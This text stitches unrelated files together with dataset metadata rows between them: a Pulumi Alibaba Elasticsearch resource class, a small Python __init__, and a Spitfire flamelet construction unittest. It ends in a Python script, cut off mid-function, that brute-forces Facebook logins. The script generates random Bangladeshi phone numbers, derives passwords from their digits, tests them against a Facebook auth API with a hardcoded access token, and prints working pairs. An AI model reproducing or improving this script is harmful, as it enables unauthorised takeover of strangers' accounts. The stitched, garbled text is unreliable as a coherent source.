:param pulumi.Input[Mapping[str, Any]] setting_config: The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
:param pulumi.Input[str] status: The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
:param pulumi.Input[Mapping[str, Any]] tags: A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
:param pulumi.Input[str] version: Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
:param pulumi.Input[str] vswitch_id: The ID of VSwitch.
:param pulumi.Input[int] zone_count: The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _InstanceState.__new__(_InstanceState)
__props__.__dict__["client_node_amount"] = client_node_amount
__props__.__dict__["client_node_spec"] = client_node_spec
__props__.__dict__["data_node_amount"] = data_node_amount
__props__.__dict__["data_node_disk_encrypted"] = data_node_disk_encrypted
__props__.__dict__["data_node_disk_size"] = data_node_disk_size
__props__.__dict__["data_node_disk_type"] = data_node_disk_type
__props__.__dict__["data_node_spec"] = data_node_spec
__props__.__dict__["description"] = description
__props__.__dict__["domain"] = domain
__props__.__dict__["enable_kibana_private_network"] = enable_kibana_private_network
__props__.__dict__["enable_kibana_public_network"] = enable_kibana_public_network
__props__.__dict__["enable_public"] = enable_public
__props__.__dict__["instance_charge_type"] = instance_charge_type
__props__.__dict__["kibana_domain"] = kibana_domain
__props__.__dict__["kibana_port"] = kibana_port
__props__.__dict__["kibana_private_whitelists"] = kibana_private_whitelists
__props__.__dict__["kibana_whitelists"] = kibana_whitelists
__props__.__dict__["kms_encrypted_password"] = kms_encrypted_password
__props__.__dict__["kms_encryption_context"] = kms_encryption_context
__props__.__dict__["master_node_spec"] = master_node_spec
__props__.__dict__["password"] = password
__props__.__dict__["period"] = period
__props__.__dict__["port"] = port
__props__.__dict__["private_whitelists"] = private_whitelists
__props__.__dict__["protocol"] = protocol
__props__.__dict__["public_whitelists"] = public_whitelists
__props__.__dict__["resource_group_id"] = resource_group_id
__props__.__dict__["setting_config"] = setting_config
__props__.__dict__["status"] = status
__props__.__dict__["tags"] = tags
__props__.__dict__["version"] = version
__props__.__dict__["vswitch_id"] = vswitch_id
__props__.__dict__["zone_count"] = zone_count
return Instance(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="clientNodeAmount")
def client_node_amount(self) -> pulumi.Output[Optional[int]]:
"""
The Elasticsearch cluster's client node quantity, between 2 and 25.
"""
return pulumi.get(self, "client_node_amount")
@property
@pulumi.getter(name="clientNodeSpec")
def client_node_spec(self) -> pulumi.Output[Optional[str]]:
"""
The client node spec. If specified, client node will be created.
"""
return pulumi.get(self, "client_node_spec")
@property
@pulumi.getter(name="dataNodeAmount")
def data_node_amount(self) -> pulumi.Output[int]:
"""
The Elasticsearch cluster's data node quantity, between 2 and 50.
"""
return pulumi.get(self, "data_node_amount")
@property
@pulumi.getter(name="dataNodeDiskEncrypted")
def data_node_disk_encrypted(self) -> pulumi.Output[Optional[bool]]:
"""
If encrypt the data node disk. Valid values are `true`, `false`. Default to `false`.
"""
return pulumi.get(self, "data_node_disk_encrypted")
@property
@pulumi.getter(name="dataNodeDiskSize")
def data_node_disk_size(self) -> pulumi.Output[int]:
"""
The single data node storage space.
- `cloud_ssd`: An SSD disk, supports a maximum of 2048 GiB (2 TB).
"""
return pulumi.get(self, "data_node_disk_size")
@property
@pulumi.getter(name="dataNodeDiskType")
def data_node_disk_type(self) -> pulumi.Output[str]:
"""
The data node disk type. Supported values: cloud_ssd, cloud_efficiency.
"""
return pulumi.get(self, "data_node_disk_type")
@property
@pulumi.getter(name="dataNodeSpec")
def data_node_spec(self) -> pulumi.Output[str]:
"""
The data node specifications of the Elasticsearch instance.
"""
return pulumi.get(self, "data_node_spec")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
The description of instance. It a string of 0 to 30 characters.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter
def domain(self) -> pulumi.Output[str]:
"""
Instance connection domain (only VPC network access supported).
"""
return pulumi.get(self, "domain")
@property
@pulumi.getter(name="enableKibanaPrivateNetwork")
def enable_kibana_private_network(self) -> pulumi.Output[Optional[bool]]:
"""
Bool, default to false. When it set to true, the instance can close kibana private network access。
"""
return pulumi.get(self, "enable_kibana_private_network")
@property
@pulumi.getter(name="enableKibanaPublicNetwork")
def enable_kibana_public_network(self) -> pulumi.Output[Optional[bool]]:
"""
Bool, default to true. When it set to false, the instance can enable kibana public network access。
"""
return pulumi.get(self, "enable_kibana_public_network")
@property
@pulumi.getter(name="enablePublic")
def enable_public(self) -> pulumi.Output[Optional[bool]]:
"""
Bool, default to false. When it set to true, the instance can enable public network access。
"""
return pulumi.get(self, "enable_public")
@property
@pulumi.getter(name="instanceChargeType")
def instance_charge_type(self) -> pulumi.Output[Optional[str]]:
"""
Valid values are `PrePaid`, `PostPaid`. Default to `PostPaid`. From version 1.69.0, the Elasticsearch cluster allows you to update your instance_charge_ype from `PostPaid` to `PrePaid`, the following attributes are required: `period`. But, updating from `PostPaid` to `PrePaid` is not supported.
"""
return pulumi.get(self, "instance_charge_type")
@property
@pulumi.getter(name="kibanaDomain")
def kibana_domain(self) -> pulumi.Output[str]:
"""
Kibana console domain (Internet access supported).
"""
return pulumi.get(self, "kibana_domain")
@property
@pulumi.getter(name="kibanaPort")
def kibana_port(self) -> pulumi.Output[int]:
"""
Kibana console port.
"""
return pulumi.get(self, "kibana_port")
@property
@pulumi.getter(name="kibanaPrivateWhitelists")
def kibana_private_whitelists(self) -> pulumi.Output[Sequence[str]]:
"""
Set the Kibana's IP whitelist in private network.
"""
return pulumi.get(self, "kibana_private_whitelists")
@property
@pulumi.getter(name="kibanaWhitelists")
def kibana_whitelists(self) -> pulumi.Output[Sequence[str]]:
"""
Set the Kibana's IP whitelist in internet network.
"""
return pulumi.get(self, "kibana_whitelists")
@property
@pulumi.getter(name="kmsEncryptedPassword")
def kms_encrypted_password(self) -> pulumi.Output[Optional[str]]:
"""
An KMS encrypts password used to a instance. If the `password` is filled in, this field will be ignored, but you have to specify one of `password` and `kms_encrypted_password` fields.
"""
return pulumi.get(self, "kms_encrypted_password")
@property
@pulumi.getter(name="kmsEncryptionContext")
def kms_encryption_context(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
An KMS encryption context used to decrypt `kms_encrypted_password` before creating or updating instance with `kms_encrypted_password`. See [Encryption Context](https://www.alibabacloud.com/help/doc-detail/42975.htm). It is valid when `kms_encrypted_password` is set.
"""
return pulumi.get(self, "kms_encryption_context")
@property
@pulumi.getter(name="masterNodeSpec")
def master_node_spec(self) -> pulumi.Output[Optional[str]]:
"""
The dedicated master node spec. If specified, dedicated master node will be created.
"""
return pulumi.get(self, "master_node_spec")
@property
@pulumi.getter
def password(self) -> pulumi.Output[Optional[str]]:
"""
The password of the instance. The password can be 8 to 30 characters in length and must contain three of the following conditions: uppercase letters, lowercase letters, numbers, and special characters (`!@#$%^&*()_+-=`).
"""
return pulumi.get(self, "password")
@property
@pulumi.getter
def period(self) -> pulumi.Output[Optional[int]]:
"""
The duration that you will buy Elasticsearch instance (in month). It is valid when instance_charge_type is `PrePaid`. Valid values: [1~9], 12, 24, 36. Default to 1. From version 1.69.2, when to modify this value, the resource can renewal a `PrePaid` instance.
"""
return pulumi.get(self, "period")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Instance connection port.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter(name="privateWhitelists")
def private_whitelists(self) -> pulumi.Output[Sequence[str]]:
"""
Set the instance's IP whitelist in VPC network.
"""
return pulumi.get(self, "private_whitelists")
@property
@pulumi.getter
def protocol(self) -> pulumi.Output[Optional[str]]:
"""
Elasticsearch protocol. Supported values: `HTTP`, `HTTPS`.default is `HTTP`.
"""
return pulumi.get(self, "protocol")
@property
@pulumi.getter(name="publicWhitelists")
def public_whitelists(self) -> pulumi.Output[Sequence[str]]:
"""
Set the instance's IP whitelist in internet network.
"""
return pulumi.get(self, "public_whitelists")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
"""
The Id of resource group which the Elasticsearch instance belongs.
"""
return pulumi.get(self, "resource_group_id")
@property
@pulumi.getter(name="settingConfig")
def setting_config(self) -> pulumi.Output[Mapping[str, Any]]:
"""
The YML configuration of the instance.[Detailed introduction](https://www.alibabacloud.com/help/doc-detail/61336.html).
"""
return pulumi.get(self, "setting_config")
@property
@pulumi.getter
def status(self) -> pulumi.Output[str]:
"""
The Elasticsearch instance status. Includes `active`, `activating`, `inactive`. Some operations are denied when status is not `active`.
"""
return pulumi.get(self, "status")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, Any]]]:
"""
A mapping of tags to assign to the resource.
- key: It can be up to 128 characters in length. It cannot begin with "aliyun", "acs:". It cannot contain "http://" and "https://". It cannot be a null string.
- value: It can be up to 128 characters in length. It cannot contain "http://" and "https://". It can be a null string.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def version(self) -> pulumi.Output[str]:
"""
Elasticsearch version. Supported values: `5.5.3_with_X-Pack`, `6.3_with_X-Pack`, `6.7_with_X-Pack`, `6.8_with_X-Pack`, `7.4_with_X-Pack` and `7.7_with_X-Pack`.
"""
return pulumi.get(self, "version")
@property
@pulumi.getter(name="vswitchId")
def vswitch_id(self) -> pulumi.Output[str]:
"""
The ID of VSwitch.
"""
return pulumi.get(self, "vswitch_id")
@property
@pulumi.getter(name="zoneCount")
def zone_count(self) -> pulumi.Output[Optional[int]]:
"""
The Multi-AZ supported for Elasticsearch, between 1 and 3. The `data_node_amount` value must be an integral multiple of the `zone_count` value.
"""
return pulumi.get(self, "zone_count")
| 53.134014
| 350
| 0.672544
| 11,162
| 88,415
| 5.100161
| 0.031625
| 0.086952
| 0.084774
| 0.041737
| 0.966291
| 0.958105
| 0.946107
| 0.939555
| 0.935339
| 0.920514
| 0
| 0.007198
| 0.220675
| 88,415
| 1,663
| 351
| 53.165965
| 0.818995
| 0.379031
| 0
| 0.832292
| 1
| 0
| 0.115498
| 0.033726
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16875
| false
| 0.052083
| 0.005208
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
9d7c862da747bf78ad3e2ac930d2bc114aa0febb
| 125
|
py
|
Python
|
rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
rubin_sim/scheduler/basis_functions/__init__.py
|
RileyWClarke/flarubin
|
eb7b1ee21c828523f8a5374fe4510fe6e5ec2a2a
|
[
"MIT"
] | null | null | null |
from .basis_functions import *
from .mask_basis_funcs import *
from .feasibility_funcs import *
from .rolling_funcs import *
| 25
| 32
| 0.808
| 17
| 125
| 5.647059
| 0.470588
| 0.3125
| 0.3125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.128
| 125
| 4
| 33
| 31.25
| 0.880734
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9dccf7be389b738013850ada4d2622047dc63864
| 9,441
|
py
|
Python
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 11
|
2020-03-20T02:10:17.000Z
|
2021-12-14T10:08:09.000Z
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 18
|
2020-03-18T18:58:56.000Z
|
2021-12-21T02:35:35.000Z
|
tests/flamelet/test_flamelet_construction_coverage.py
|
sandialabs/Spitfire
|
65670e3ba5d1ccb4ac72524b77957706345c5bf6
|
[
"Apache-2.0"
] | 2
|
2021-05-31T17:24:56.000Z
|
2021-06-20T05:27:41.000Z
|
import unittest
import numpy as np
import pickle
from os.path import join, abspath
from spitfire import ChemicalMechanismSpec, Flamelet, FlameletSpec
def construct_adiabatic_flamelet(initialization, grid_type, diss_rate_form):
test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
air = mechanism.stream(stp_air=True)
fuel = mechanism.stream('X', 'H2:1')
fuel.TP = 300, air.P
if grid_type == 'uniform':
grid_specs = {'grid_points': 8}
elif grid_type == 'clustered-1args':
grid_specs = {'grid_points': 8}
elif grid_type == 'clustered-2args':
grid_specs = {'grid_points': 8, 'grid_cluster_intensity': 4.}
elif grid_type == 'clustered-3args':
grid_specs = {'grid_points': 8, 'grid_cluster_intensity': 4., 'grid_cluster_point': 0.4}
elif grid_type == 'custom':
grid_specs = {'grid': np.linspace(0., 1., 8)}
if diss_rate_form == 'Peters':
drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}
elif diss_rate_form == 'uniform':
drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}
elif diss_rate_form == 'custom':
drf_specs = {'dissipation_rate': np.linspace(0., 1., 8)}
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'initial_condition': initialization}
flamelet_specs.update(grid_specs)
flamelet_specs.update(drf_specs)
try:
Flamelet(**flamelet_specs)
Flamelet(flamelet_specs=flamelet_specs)
fso = FlameletSpec(**flamelet_specs)
f = Flamelet(fso)
fso_pickle = pickle.dumps(fso)
fso2 = pickle.loads(fso_pickle)
f = Flamelet(fso2)
lib = f.make_library_from_interior_state(f.initial_interior_state)
Flamelet(library_slice=lib)
lib_pickle = pickle.dumps(lib)
lib2 = pickle.loads(lib_pickle)
Flamelet(library_slice=lib2)
return True
except:
return False
def construct_nonadiabatic_flamelet(initialization, grid_type, diss_rate_form):
test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
air = mechanism.stream(stp_air=True)
fuel = mechanism.stream('X', 'H2:1')
fuel.TP = 300, air.P
if grid_type == 'uniform':
grid_specs = {'grid_points': 8}
elif grid_type == 'clustered-1args':
grid_specs = {'grid_points': 8}
elif grid_type == 'clustered-2args':
grid_specs = {'grid_points': 8, 'grid_cluster_intensity': 4.}
elif grid_type == 'clustered-3args':
grid_specs = {'grid_points': 8, 'grid_cluster_intensity': 4., 'grid_cluster_point': 0.4}
elif grid_type == 'custom':
grid_specs = {'grid': np.linspace(0., 1., 8)}
if diss_rate_form == 'Peters':
drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}
elif diss_rate_form == 'uniform':
drf_specs = {'max_dissipation_rate': 1., 'dissipation_rate_form': diss_rate_form}
elif diss_rate_form == 'custom':
drf_specs = {'dissipation_rate': np.linspace(0., 1., 8)}
try:
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'initial_condition': initialization,
'heat_transfer': 'nonadiabatic',
'convection_temperature': 350.,
'convection_coefficient': 0.,
'radiation_temperature': 350.,
'radiative_emissivity': 0.}
flamelet_specs.update(grid_specs)
flamelet_specs.update(drf_specs)
Flamelet(**flamelet_specs)
Flamelet(flamelet_specs=flamelet_specs)
fso = FlameletSpec(**flamelet_specs)
f = Flamelet(fso)
fso_pickle = pickle.dumps(fso)
fso2 = pickle.loads(fso_pickle)
f = Flamelet(fso2)
lib = f.make_library_from_interior_state(f.initial_interior_state)
Flamelet(library_slice=lib)
lib_pickle = pickle.dumps(lib)
lib2 = pickle.loads(lib_pickle)
Flamelet(library_slice=lib2)
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'initial_condition': initialization,
'heat_transfer': 'nonadiabatic',
'scale_heat_loss_by_temp_range': True,
'scale_convection_by_dissipation': True,
'use_linear_ref_temp_profile': True,
'convection_coefficient': 1.e7,
'radiative_emissivity': 0.}
flamelet_specs.update(grid_specs)
flamelet_specs.update(drf_specs)
Flamelet(**flamelet_specs)
Flamelet(flamelet_specs=flamelet_specs)
fso = FlameletSpec(**flamelet_specs)
f = Flamelet(fso)
fso_pickle = pickle.dumps(fso)
fso2 = pickle.loads(fso_pickle)
f = Flamelet(fso2)
lib = f.make_library_from_interior_state(f.initial_interior_state)
Flamelet(library_slice=lib)
lib_pickle = pickle.dumps(lib)
lib2 = pickle.loads(lib_pickle)
Flamelet(library_slice=lib2)
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'initial_condition': initialization,
'heat_transfer': 'nonadiabatic',
'scale_heat_loss_by_temp_range': False,
'scale_convection_by_dissipation': False,
'use_linear_ref_temp_profile': True,
'convection_coefficient': 1.e7,
'radiative_emissivity': 0.}
flamelet_specs.update(grid_specs)
flamelet_specs.update(drf_specs)
Flamelet(**flamelet_specs)
Flamelet(flamelet_specs=flamelet_specs)
fso = FlameletSpec(**flamelet_specs)
f = Flamelet(fso)
fso_pickle = pickle.dumps(fso)
fso2 = pickle.loads(fso_pickle)
f = Flamelet(fso2)
lib = f.make_library_from_interior_state(f.initial_interior_state)
Flamelet(library_slice=lib)
lib_pickle = pickle.dumps(lib)
lib2 = pickle.loads(lib_pickle)
Flamelet(library_slice=lib2)
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'initial_condition': initialization,
'heat_transfer': 'nonadiabatic',
'scale_heat_loss_by_temp_range': False,
'scale_convection_by_dissipation': True,
'use_linear_ref_temp_profile': True,
'convection_coefficient': 1.e7,
'radiative_emissivity': 0.}
flamelet_specs.update(grid_specs)
flamelet_specs.update(drf_specs)
Flamelet(**flamelet_specs)
Flamelet(flamelet_specs=flamelet_specs)
fso = FlameletSpec(**flamelet_specs)
f = Flamelet(fso)
fso_pickle = pickle.dumps(fso)
fso2 = pickle.loads(fso_pickle)
f = Flamelet(fso2)
lib = f.make_library_from_interior_state(f.initial_interior_state)
Flamelet(library_slice=lib)
lib_pickle = pickle.dumps(lib)
lib2 = pickle.loads(lib_pickle)
Flamelet(library_slice=lib2)
return True
except:
return False
def create_test(ht, ic, gt, drf):
if ht == 'adiabatic':
def test(self):
self.assertTrue(construct_adiabatic_flamelet(ic, gt, drf))
elif ht == 'nonadiabatic':
def test(self):
self.assertTrue(construct_nonadiabatic_flamelet(ic, gt, drf))
return test
class Construction(unittest.TestCase):
pass
test_xml = abspath(join('tests', 'test_mechanisms', 'h2-burke.xml'))
mechanism = ChemicalMechanismSpec(cantera_xml=test_xml, group_name='h2-burke')
air = mechanism.stream(stp_air=True)
fuel = mechanism.stream('X', 'H2:1')
fuel.TP = 300, air.P
flamelet_specs = {'mech_spec': mechanism,
'oxy_stream': air,
'fuel_stream': fuel,
'grid_points': 8,
'grid_cluster_intensity': 4.,
'initial_condition': 'equilibrium',
'max_dissipation_rate': 0.}
temp_flamelet = Flamelet(**flamelet_specs)
for ht in temp_flamelet._heat_transfers:
for ic in ['equilibrium', 'linear-TY', 'unreacted', temp_flamelet.initial_interior_state]:
for gt in ['uniform', 'clustered-1args', 'clustered-2args', 'clustered-3args', 'custom']:
for drf in ['uniform', 'Peters', 'custom']:
ic_str = 'icstate' if isinstance(ic, np.ndarray) else ic
testname = 'test_construct_flamelet_' + ht + '_' + ic_str + '_' + gt + '_' + drf
setattr(Construction, testname, create_test(ht, ic, gt, drf))
if __name__ == '__main__':
unittest.main()
| 38.378049
| 97
| 0.601313
| 1,032
| 9,441
| 5.184109
| 0.126938
| 0.089907
| 0.026916
| 0.054206
| 0.854953
| 0.854953
| 0.842243
| 0.828411
| 0.828411
| 0.828411
| 0
| 0.015213
| 0.2898
| 9,441
| 245
| 98
| 38.534694
| 0.782699
| 0
| 0
| 0.826733
| 0
| 0
| 0.18981
| 0.064612
| 0
| 0
| 0
| 0
| 0.009901
| 1
| 0.024752
| false
| 0.004951
| 0.024752
| 0
| 0.079208
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9dd1675dcca8b7c45a39bdad38fc6485f172184a
| 27,433
|
py
|
Python
|
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
newfile.py
|
HANTER2/z
|
1cc18ba7cd86ebf5b6795b08022c29eb3bba8f61
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import sys
import random
import requests
from threading import Thread as pool
#text colour()
white = '\33[90m'
red = '\33[91m'
green = '\33[92m'
yollow = '\33[93m'
blue = '\33[94m'
rosy = '\33[95m'
pest = '\33[96m'
blue = '\x1b[94m'
lightblue = '\x1b[94m'
red = '\x1b[91m'
white = '\x1b[97m'
green = '\x1b[93m'
green = '\x1b[1;32m'
cyan = '\x1b[96m'
end = '\x1b[0m'
yellow = '\n\n\x1b[1;93m'
#colour end
file2=("file",'a')
try:
import requests
import mechanize
except:
os.system("pip install requests")
os.system("pip install mechanize")
os.system("pip2 install requests")
os.system("pip2 install mechanize")
logo11=(yellow+"""
███╗░░░███╗██████╗░
████╗░████║██╔══██╗
██╔████╔██║██║░░██║
██║╚██╔╝██║██║░░██║
██║░╚═╝░██║██████╔╝
╚═╝░░░░░╚═╝╚═════╝░
░█████╗░██╗░░░░░░█████╗░███╗░░░███╗██╗███╗░░██╗
██╔══██╗██║░░░░░██╔══██╗████╗░████║██║████╗░██║
███████║██║░░░░░███████║██╔████╔██║██║██╔██╗██║
██╔══██║██║░░░░░██╔══██║██║╚██╔╝██║██║██║╚████║
██║░░██║███████╗██║░░██║██║░╚═╝░██║██║██║░╚███║
╚═╝░░╚═╝╚══════╝╚═╝░░╚═╝╚═╝░░░░░╚═╝╚═╝╚═╝░░╚══╝
\x1b[94m
╔═══╦╗─╔╦═══╦╗╔╗╔╦═══╦╗─╔╦╗─╔╦═══╦╗──╔╗
║╔═╗║║─║║╔═╗║║║║║╠╗╔╗║║─║║║─║║╔═╗║╚╗╔╝║
║║─╚╣╚═╝║║─║║║║║║║║║║║╚═╝║║─║║╚═╝╠╗╚╝╔╝
║║─╔╣╔═╗║║─║║╚╝╚╝║║║║║╔═╗║║─║║╔╗╔╝╚╗╔╝
║╚═╝║║─║║╚═╝╠╗╔╗╔╬╝╚╝║║─║║╚═╝║║║╚╗─║║
╚═══╩╝─╚╩═══╝╚╝╚╝╚═══╩╝─╚╩═══╩╝╚═╝─╚╝""")
alamin=(green+"\n---------------------- Delovement by MD ALAMIN CHOWDOWRY --------")
def b (z):
for word in z + '\n':
sys.stdout.write(word)
sys.stdout.flush()
time.sleep(0.3)
os.system('clear')
print(logo11)
print(red+"#######################################################")
print(green+"# GITHHP:https://github.com/HANTER2 #")
print("# FB:Mdalamin54321 #")
print("# Whatapp&&Imo :+8801705677081 #")
print("# Tnx For GITHUP:cracker911181 #")
print("# Youtube:MAFIYA CYBER KING #")
print(red+"#######################################################")
print(green+"\n[1] GP ")
print(green+"\n[2] Robi")
print(green+"\n[3] Bangalink")
print(cyan+"\n[4] Contact me")
print(red+"\n\n*****************************************************")
a=input(green+"\n\nEnter Your BD Oparator : ")
b(cyan+" []Loding\x1b[1;32m ....")
sys.stdout.flush()
time.sleep(9)
os.system('clear')
if a=="1":
print(green+"""
_____ _____
/ ____| | __ \
| | __ | |__) |
| | |_ | | ___/
| |__| | | |
\_____| |_|""")
print(green+"\n171,172,173,174,176,175,177,179,170,178")
if a=="2":
print("""
_______ __ __
| \ | \ | \
| $$$$$$$\ ______ | $$____ \$$
| $$__| $$ / \ | $$ \ | \
| $$ $$| $$$$$$\| $$$$$$$\| $$
| $$$$$$$\| $$ | $$| $$ | $$| $$
| $$ | $$| $$__/ $$| $$__/ $$| $$
| $$ | $$ \$$ $$| $$ $$| $$
\$$ \$$ \$$$$$$ \$$$$$$$ \$$
""")
print(alamin)
print(red+"\n 181,182,183,184,185,186,187,188,189,180")
if a=="3":
print(green+"""
____
| _ \
| |_) | __ _ _ __ __ _ __ _
| _ < / _` | '_ \ / _` |/ _` |
| |_) | (_| | | | | (_| | (_| |
|____/ \__,_|_| |_|\__, |\__,_|
__/ |
|___/
\33[94m
.-. .-..-. .-..-. .-.
| | | || `| || |/ /
| `--.| || |\ || |\ \
`----'`-'`-' `-'`-' `-'
""")
print(green+"\n---------------------- Delovement by MD ALAMIN CHOWDOWRY --------")
print(green+"\n191,192,193,194,195,196,197,198,199,190")
if a=="4":
os.system("xdg-open https://www.facebook.com/Mdalamin54321")
manu()
code=str(input("\nEnter Your Code: "))
print(green+"\nTo Exit: Pess (Ctrl +c)\n")
print(cyan+"\n♦♠♥♣♠♦♥♠♥♠♥♪♥♠♦♠♥♠♦♠♥♣♠♪♥♦")
##############################
def hi1():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
a=("\n+"+user1," | ",pas1)
def hi2():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi3():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi4():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi5():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
y=str(g[14:17])
if y=="401":
continue
else:
print("\n+"+user1," | ",pas1)
def hi6():
for i in range(100):
ur=random.randint(1111111,9999999)
aa=str(ur)
usr=str(ur)
user1=str('880'+code+usr)
pas1=str(user1[7:13])
g=requests.get('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email='+user1+'&locale=en_US&password='+pas1+'&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm').text
# print(user
# print(pas)
